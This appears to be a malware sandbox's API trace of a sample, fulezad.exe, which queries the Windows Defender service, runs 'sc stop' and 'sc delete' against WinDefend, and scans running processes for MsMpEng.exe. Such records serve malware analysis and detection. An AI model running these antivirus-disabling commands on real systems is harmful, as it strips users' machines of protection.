" [0103.835] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28bda8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.835] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.835] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28be20*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.835] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.835] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28be98*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.835] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.835] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28bf10*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.835] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.835] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28bf88*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.835] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.835] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c000*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.836] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.836] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c078*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.836] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.836] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c0f0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.836] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.836] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c168*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.836] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.836] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c1e0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.836] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.836] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c258*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.836] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.836] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c2d0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.836] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.836] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c348*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.836] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.836] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c3c0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.836] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.836] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c438*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.836] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.837] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c4b0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.837] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.837] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c528*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.837] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.837] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c5a0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.837] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.837] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c618*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.837] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.837] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c690*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.837] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.837] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28c790*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.838] GetStartupInfoW (in: lpStartupInfo=0x428b8a | out: lpStartupInfo=0x428b8a*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0103.838] GetSystemDirectoryW (in: lpBuffer=0x18b018, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0103.838] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x2823e0 [0103.841] OpenServiceW (hSCManager=0x2823e0, lpServiceName="WinDefend", dwDesiredAccess=0x4) returned 0x282340 [0103.841] QueryServiceStatusEx (in: hService=0x282340, InfoLevel=0x0, lpBuffer=0x18afd4, cbBufSize=0x24, pcbBytesNeeded=0x18b000 | out: lpBuffer=0x18afd4, pcbBytesNeeded=0x18b000) returned 1 [0103.841] CloseServiceHandle (hSCObject=0x282340) returned 1 [0103.842] CloseServiceHandle (hSCObject=0x2823e0) returned 1 [0103.844] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x18afa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18af94 | out: lpCommandLine="/c sc stop WinDefend", lpProcessInformation=0x18af94*(hProcess=0xd4, hThread=0xd0, dwProcessId=0x924, dwThreadId=0x920)) returned 1 [0103.866] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc delete WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x18afa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18af94 | out: lpCommandLine="/c sc delete WinDefend", lpProcessInformation=0x18af94*(hProcess=0xd8, hThread=0xdc, dwProcessId=0x910, dwThreadId=0x91c)) returned 1 [0103.870] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xec [0103.876] Process32FirstW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.877] lstrcmpiW (lpString1="[System Process]", lpString2="MsMpEng.exe") returned -1 [0103.879] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.880] lstrcmpiW (lpString1="System", lpString2="MsMpEng.exe") returned 1 [0103.880] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.881] lstrcmpiW (lpString1="smss.exe", lpString2="MsMpEng.exe") returned 1 [0103.881] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.881] lstrcmpiW (lpString1="csrss.exe", lpString2="MsMpEng.exe") returned -1 [0103.881] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0103.882] lstrcmpiW (lpString1="wininit.exe", lpString2="MsMpEng.exe") returned 1 [0103.882] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.883] lstrcmpiW (lpString1="csrss.exe", lpString2="MsMpEng.exe") returned -1 [0103.883] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0103.883] lstrcmpiW (lpString1="winlogon.exe", lpString2="MsMpEng.exe") returned 1 [0103.883] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0103.884] lstrcmpiW (lpString1="services.exe", lpString2="MsMpEng.exe") returned 1 [0103.884] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.885] lstrcmpiW (lpString1="lsass.exe", lpString2="MsMpEng.exe") returned -1 [0103.885] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.885] lstrcmpiW (lpString1="lsm.exe", lpString2="MsMpEng.exe") returned -1 [0103.885] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.886] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0103.886] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.887] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0103.887] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.887] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0103.887] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.888] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0103.888] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.889] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0103.889] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.889] lstrcmpiW (lpString1="audiodg.exe", lpString2="MsMpEng.exe") returned -1 [0103.889] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.890] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0103.890] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.891] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0103.891] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.891] lstrcmpiW (lpString1="dwm.exe", lpString2="MsMpEng.exe") returned -1 [0103.891] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.892] lstrcmpiW (lpString1="explorer.exe", lpString2="MsMpEng.exe") returned -1 [0103.892] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.893] lstrcmpiW (lpString1="spoolsv.exe", lpString2="MsMpEng.exe") returned 1 [0103.893] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.894] lstrcmpiW (lpString1="taskhost.exe", lpString2="MsMpEng.exe") returned 1 [0103.894] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.895] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0103.895] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0103.896] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="MsMpEng.exe") returned 1 [0103.896] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0103.897] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="MsMpEng.exe") returned 1 [0103.897] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0103.898] lstrcmpiW (lpString1="taskeng.exe", lpString2="MsMpEng.exe") returned 1 [0103.898] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.899] lstrcmpiW (lpString1="taskhost.exe", lpString2="MsMpEng.exe") returned 1 [0103.900] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="cdt_philadelphia.exe")) returned 1 [0103.901] lstrcmpiW (lpString1="cdt_philadelphia.exe", lpString2="MsMpEng.exe") returned -1 [0103.901] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="pipesemesteraccepted.exe")) returned 1 [0103.902] lstrcmpiW (lpString1="pipesemesteraccepted.exe", lpString2="MsMpEng.exe") returned 1 [0103.902] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="midwest-prostate.exe")) returned 1 [0103.903] lstrcmpiW (lpString1="midwest-prostate.exe", lpString2="MsMpEng.exe") returned -1 [0103.903] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x430, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="edmonton cell.exe")) returned 1 [0103.904] lstrcmpiW (lpString1="edmonton cell.exe", lpString2="MsMpEng.exe") returned -1 [0103.904] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="approx_comparisons.exe")) returned 1 [0103.905] lstrcmpiW (lpString1="approx_comparisons.exe", lpString2="MsMpEng.exe") returned -1 [0103.905] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="compliant.exe")) returned 1 [0103.906] lstrcmpiW (lpString1="compliant.exe", lpString2="MsMpEng.exe") returned -1 [0103.906] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="memovisitorslover.exe")) returned 1 [0103.908] lstrcmpiW (lpString1="memovisitorslover.exe", lpString2="MsMpEng.exe") returned -1 [0103.908] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="fixes.exe")) returned 1 [0103.909] lstrcmpiW (lpString1="fixes.exe", lpString2="MsMpEng.exe") returned -1 [0103.909] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="lower-newfoundland-checks.exe")) returned 1 [0103.910] lstrcmpiW (lpString1="lower-newfoundland-checks.exe", lpString2="MsMpEng.exe") returned -1 [0103.910] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="practice sees.exe")) returned 1 [0103.911] lstrcmpiW (lpString1="practice sees.exe", lpString2="MsMpEng.exe") returned 1 [0103.911] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="mind.exe")) returned 1 [0103.912] lstrcmpiW (lpString1="mind.exe", lpString2="MsMpEng.exe") returned -1 [0103.912] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x70c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="autos.exe")) returned 1 [0103.913] lstrcmpiW (lpString1="autos.exe", lpString2="MsMpEng.exe") returned -1 [0103.913] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed spirit.exe")) returned 1 [0103.914] lstrcmpiW (lpString1="succeed spirit.exe", lpString2="MsMpEng.exe") returned 1 